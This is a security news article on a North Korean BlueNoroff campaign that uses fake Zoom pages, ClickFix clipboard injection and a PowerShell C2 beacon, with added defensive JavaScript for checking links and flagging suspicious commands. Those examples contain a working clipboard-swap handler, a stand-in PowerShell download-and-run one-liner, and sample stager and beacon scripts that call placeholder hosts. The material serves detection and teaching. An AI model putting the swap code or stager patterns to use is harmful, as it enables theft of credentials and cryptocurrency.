New BlueNoroff Campaign Uses Fileless PowerShell and AI-Generated Zoom Lures
By Tushar Subhra Dutta
April 29, 2026
A dangerous new cyber campaign from North Korea’s Lazarus Group is targeting cryptocurrency and Web3 professionals using fake Zoom meeting interfaces, fileless PowerShell scripts, and AI-generated deepfake content.
The group behind this activity is BlueNoroff, a financially motivated subgroup known for stealing digital assets.
This campaign has spread across more than 20 countries, with the United States making up 41% of all identified victims.
The attack begins with a spear-phishing email in which the threat actor poses as a legal professional in the fintech space and sends the target a Calendly invite.
Once the victim confirms the meeting, the attacker quietly replaces the Google Meet link with a typo-squatted Zoom URL that looks nearly identical to a real one.
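How a lookalike link gets past a glance, and how a link-checking step catches it, as an added example that is not code from the article or from Arctic Wolf. It assumes that only zoom.us and its subdomains are acceptable meeting hosts; every sample link and lookalike host below is constructed for the example and is not the campaign's actual domain.

```javascript
// Added example, not from the article or Arctic Wolf: checking a meeting link
// against the provider's real domain before clicking it.
// Assumption: only zoom.us and its subdomains are acceptable; every sample URL
// and lookalike host below is constructed for this example.

const TRUSTED_ZOOM_HOSTS = ["zoom.us"];

// The weak check: a substring test. It accepts "zoom.us.attacker.example" and
// "notzoom.us", which is exactly the gap a typosquat exploits.
function naiveLooksLikeZoom(link) {
  return link.includes("zoom.us");
}

// Hardened check: parse the URL, require https, and match the hostname either
// exactly or as a dot-separated suffix of a trusted domain.
function isTrustedZoomLink(link) {
  let u;
  try {
    u = new URL(link);
  } catch {
    return false; // not an absolute, parseable URL
  }
  if (u.protocol !== "https:") return false;
  const host = u.hostname.toLowerCase();
  if (host.split(".").some((label) => label.startsWith("xn--"))) {
    return false; // punycode label: a homoglyph domain would land here
  }
  return TRUSTED_ZOOM_HOSTS.some((t) => host === t || host.endsWith("." + t));
}

// Levenshtein distance, used only to explain why a rejected host looked
// plausible: a registrable domain within two edits of a trusted one is
// labelled a typosquat rather than merely "untrusted".
function levenshtein(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0];
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j];
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      row[j] = Math.min(above + 1, row[j - 1] + 1, diag + cost);
      diag = above;
    }
  }
  return row[b.length];
}

// Last two labels of the host, e.g. "us05web.zoom.us" -> "zoom.us".
function registrableDomain(host) {
  return host.split(".").slice(-2).join(".");
}

function classifyMeetingLink(link) {
  let u;
  try {
    u = new URL(link);
  } catch {
    return { verdict: "invalid", host: null };
  }
  const host = u.hostname.toLowerCase();
  if (isTrustedZoomLink(link)) return { verdict: "trusted", host };
  if (u.protocol !== "https:") return { verdict: "insecure-scheme", host };
  const reg = registrableDomain(host);
  let closest = null;
  let distance = Infinity;
  for (const t of TRUSTED_ZOOM_HOSTS) {
    const d = levenshtein(reg, t);
    if (d < distance) { distance = d; closest = t; }
  }
  return { verdict: distance <= 2 ? "typosquat" : "untrusted", host, closest, distance };
}

// Constructed sample links: one real-looking Zoom link and three lures.
const SAMPLE_LINKS = [
  "https://us05web.zoom.us/j/1234567890",
  "https://zoorn.us/j/1234567890",
  "https://zoom.us.meet-invite.example/j/1234567890",
  "http://zoom.us/j/1234567890",
];

for (const link of SAMPLE_LINKS) {
  console.log(link, "naive:", naiveLooksLikeZoom(link), "=>", classifyMeetingLink(link).verdict);
}
```

The substring check is the bug to look for in existing "is this a Zoom link" logic: it passes the third sample, whose hostname merely starts with zoom.us. Suffix matching on the parsed hostname is the correct form, and the edit-distance label is there so an analyst can record "typosquat of zoom.us" rather than a bare "blocked".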
When the victim clicks the fake link, their browser loads a self-contained HTML page that looks exactly like the Zoom meeting interface, complete with fake participant video tiles, looping footage, and a cycling active speaker indicator.
Arctic Wolf analysts identified this targeted intrusion against a North American Web3 and cryptocurrency company, attributing it with high confidence to BlueNoroff, also tracked as APT38, Sapphire Sleet, and Stardust Chollima.
Researchers found that the full attack chain, from the initial click to complete system compromise, finished in under five minutes.
Forensic analysis confirmed the attacker maintained persistent access on the victim’s device for 66 days, stealing browser credentials, Telegram session data, and live webcam footage that was then reused to build more convincing lures for future targets.
What makes this campaign especially damaging is its self-reinforcing deepfake production pipeline. Analysts uncovered more than 950 files on the attacker’s hosting server, including AI-generated headshot images confirmed via C2PA cryptographic metadata as outputs of OpenAI’s GPT-4o model, real webcam footage stolen from prior victims, and deepfake composite videos.
DM screenshot showing a compromised Telegram account impersonating a previous victim (Source – Arctic Wolf)
Each successful attack feeds raw material into the next, making future meetings more convincing. CEOs and founders account for 45% of all identified targets, reflecting BlueNoroff’s focus on individuals with direct access to cryptocurrency assets and wallet infrastructure.
The ClickFix Payload Delivery
Once the victim enters the fake Zoom meeting, a persistent overlay appears claiming the user’s SDK is outdated and needs an update.
This is a ClickFix-style clipboard injection attack. The victim sees what look like harmless diagnostic commands and is told to copy and paste them into the Windows Run dialog or terminal.
What they do not realize is that the page silently replaces the clipboard content with a hidden PowerShell execution command the moment they copy it.
Zoom-branded fake meeting interface with ‘SDK deprecated’ overlay (Source – Arctic Wolf)
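The clipboard swap itself, written out as an added example rather than the lure's own code (the article does not reproduce the page source). The visible "diagnostic" string and the hidden command are stand-ins; the host in the hidden command is an invented, non-resolving name, not the campaign's C2.

```javascript
// Added example, not the lure's actual script: how a ClickFix page swaps the
// clipboard, and the check a defender can apply before pasting.
// Both strings below are constructed; the host is deliberately unresolvable.

// What the victim believes they are copying.
const VISIBLE_TEXT = "zoom-sdk --repair-audio --verbose";

// A stand-in for what actually reaches the clipboard: a hidden-window
// PowerShell one-liner that fetches and runs a remote script (the shape of the
// command as the article describes it, not its real content).
const HIDDEN_COMMAND =
  'powershell -w hidden -ep bypass -c "irm https://sdk-update.example.invalid/u | iex"';

// Attacker side. Browsers dispatch a "copy" event when the user presses Ctrl+C.
// A listener can write its own text to the clipboard and cancel the default
// action, so the selection the user highlighted is never copied at all.
function makeClipboardSwapHandler(hiddenCommand) {
  return function onCopy(event) {
    event.clipboardData.setData("text/plain", hiddenCommand);
    event.preventDefault(); // without this, the browser writes the selection
  };
}

// In a real page this is the whole install step:
//   document.addEventListener("copy", makeClipboardSwapHandler(HIDDEN_COMMAND));

// A minimal stand-in for the browser's ClipboardEvent so the mechanism runs
// outside a browser. Returns what the clipboard holds after the copy.
function simulateCopy(selectedText, handler) {
  const clipboard = {};
  let defaultPrevented = false;
  const event = {
    clipboardData: { setData: (type, value) => { clipboard[type] = value; } },
    preventDefault: () => { defaultPrevented = true; },
  };
  if (handler) handler(event);
  if (!defaultPrevented) clipboard["text/plain"] = selectedText; // browser default
  return clipboard["text/plain"];
}

// Defender side: the clipboard is observable before it is pasted. Comparing
// what was highlighted with what was copied exposes the swap regardless of how
// the hidden command is obfuscated, and a shell launcher in the pasted text is
// a second, independent signal.
function detectClipboardTampering(selectedText, clipboardText) {
  return {
    tampered: selectedText.trim() !== clipboardText.trim(),
    launchesShell: /\b(?:powershell|pwsh|cmd)(?:\.exe)?\b/i.test(clipboardText),
  };
}

function demo() {
  const swapped = simulateCopy(VISIBLE_TEXT, makeClipboardSwapHandler(HIDDEN_COMMAND));
  const honest = simulateCopy(VISIBLE_TEXT, null);
  return {
    swapped: detectClipboardTampering(VISIBLE_TEXT, swapped),
    honest: detectClipboardTampering(VISIBLE_TEXT, honest),
  };
}

console.log(demo());
```

The practical habit this encodes: paste into a text editor first, not into Win+R. The Run dialog shows only the first line of whatever lands in it, which is why these lures point victims there.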
The injected PowerShell command downloads an obfuscated second-stage script from the attacker’s command-and-control server and saves it to the user’s Temp folder as chromechip.log, a name chosen to pass as a harmless log file.
PowerShell then executes that file in a hidden window, installing a C2 beacon that operates entirely in memory and contacts the attacker every five seconds; persistence comes from a shortcut dropped into the user’s Startup folder.
The implant collects hostname, OS version, running processes, admin privileges, and timezone data, packaging everything into a structured JSON beacon sent to a remote server.
Decoded PowerShell C2 implant showing system profiling routine and JSON beacon structure (Source – Arctic Wolf)
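Detection logic for the stager and beacon traits described above, and for the Script Block Logging recommendation later on the page, as an added example that is not Arctic Wolf's or the article's code. It assumes PowerShell Script Block Logging (Event ID 4104) is already on and that a collector has parsed each event into an object with EventID and ScriptBlockText fields. The four sample events are constructed: the hosts are unresolvable stand-ins and the scripts are illustrative; only the chromechip.log and Startup-shortcut names come from the article.

```javascript
// Added example, not code from Arctic Wolf or the article: scoring PowerShell
// Script Block Logging records (Event ID 4104) for the traits the article
// attributes to this chain. Assumes a collector has already parsed each event
// into { EventID, ScriptBlockText }. Sample events are constructed; the hosts
// are unresolvable stand-ins and only the file/shortcut names come from the
// article.

const INDICATORS = [
  { id: "hidden-window",      weight: 3, re: /-w(?:indowstyle)?\s+hidden/i },
  { id: "exec-policy-bypass", weight: 2, re: /-e(?:xecutionpolicy|p)?\s+bypass/i },
  { id: "web-request",        weight: 3, re: /\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString|DownloadFile)\b/i },
  { id: "script-in-temp-log", weight: 3, re: /\$env:TEMP[\\\/][^\s'"]+\.log\b/i },
  { id: "invoke-expression",  weight: 2, re: /\b(?:Invoke-Expression|iex)\b/i },
  { id: "encoded-command",    weight: 2, re: /-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+\/=]{20,}/i },
  { id: "startup-lnk",        weight: 3, re: /Startup[\\\/][^'"]+\.lnk/i },
  { id: "tight-beacon-loop",  weight: 2, re: /while\s*\(\s*\$true\s*\)[\s\S]*?Start-Sleep\s+(?:-s(?:econds)?\s+)?[1-9]\b/i },
  { id: "host-profiling",     weight: 1, re: /\$env:COMPUTERNAME|Win32_OperatingSystem|\bGet-Process\b|Get-TimeZone|IsInRole/i },
  { id: "json-serialise",     weight: 1, re: /ConvertTo-Json/i },
];

// Sum the weights of every indicator that fires; each fires at most once.
function scoreScriptBlock(text) {
  const matched = INDICATORS.filter((ind) => ind.re.test(text));
  return {
    score: matched.reduce((sum, ind) => sum + ind.weight, 0),
    hits: matched.map((ind) => ind.id),
  };
}

function triageEvent(event) {
  if (event.EventID !== 4104) return { verdict: "skipped", score: 0, hits: [] };
  const { score, hits } = scoreScriptBlock(event.ScriptBlockText);
  const verdict = score >= 6 ? "alert" : score >= 3 ? "review" : "ok";
  return { verdict, score, hits };
}

// Constructed 4104 records: a stager-like block, a beacon-like block, and two
// benign admin scripts that share individual commands with them.
const SAMPLE_EVENTS = [
  { EventID: 4104, ScriptBlockText: [
    `$p = "$env:TEMP\\chromechip.log"`,
    `(New-Object Net.WebClient).DownloadFile('https://sdk-update.example.invalid/u', $p)`,
    `Start-Process powershell -WindowStyle Hidden -ArgumentList "-ep bypass -c iex (Get-Content '$p' -Raw)"`,
    `$lnk = "$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Chrome Update Certificated.lnk"`,
    `$s = (New-Object -ComObject WScript.Shell).CreateShortcut($lnk); $s.TargetPath = 'powershell.exe'`,
    `$s.Arguments = "-w hidden -ep bypass -f $p"; $s.Save()`,
  ].join("\n") },
  { EventID: 4104, ScriptBlockText: [
    `while ($true) {`,
    `  $b = @{ host = $env:COMPUTERNAME; os = (Get-CimInstance Win32_OperatingSystem).Caption;`,
    `          procs = (Get-Process).Name; tz = (Get-TimeZone).Id;`,
    `          admin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole('Administrators') }`,
    `  Invoke-RestMethod -Uri 'https://beacon.example.invalid/c' -Method Post -Body ($b | ConvertTo-Json -Compress)`,
    `  Start-Sleep -Seconds 5`,
    `}`,
  ].join("\n") },
  { EventID: 4104, ScriptBlockText:
    `Get-Process | Sort-Object CPU -Descending | Select-Object -First 10 Name, CPU | ConvertTo-Json | Out-File C:\\reports\\top-cpu.json` },
  { EventID: 4104, ScriptBlockText:
    `Get-ChildItem $env:TEMP -Filter *.log | Where-Object LastWriteTime -lt (Get-Date).AddDays(-7) | Remove-Item` },
];

const RESULTS = SAMPLE_EVENTS.map(triageEvent);
RESULTS.forEach((r, i) => console.log(`event ${i}: ${r.verdict} (score ${r.score}) ${r.hits.join(", ")}`));
```

The weights are deliberately lopsided: a single ConvertTo-Json or Get-Process in a script is everyday administration and scores 1, while a hidden window, a download to a .log file under Temp, or a Startup .lnk each score 3 on their own. The beacon block is the case that justifies the logging recommendation: nothing about it ever touches disk, yet its de-obfuscated text still lands in the 4104 event the moment PowerShell runs it.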
Organizations in Web3, cryptocurrency, and financial services should verify all meeting links through a secondary communication method before joining any call.
Legitimate meeting platforms never ask users to paste commands into the Run dialog or a terminal to fix audio, camera, or SDK issues; any such prompt is the ClickFix lure itself.
Security teams should block identified C2 addresses, remove the Startup shortcut called Chrome Update Certificated.lnk, and delete chromechip.log and chrome-debug-data001.log from affected devices.
All browser-stored passwords, API keys, and cryptocurrency wallet credentials must be rotated immediately.
PowerShell Script Block Logging should be enabled on all endpoints to support early detection of obfuscated payload execution. It records the content of every script block PowerShell runs, including blocks that execute purely in memory, as Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log, and can be turned on through Group Policy (Administrative Templates > Windows Components > Windows PowerShell > Turn on PowerShell Script Block Logging) or by setting EnableScriptBlockLogging to 1 under HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging.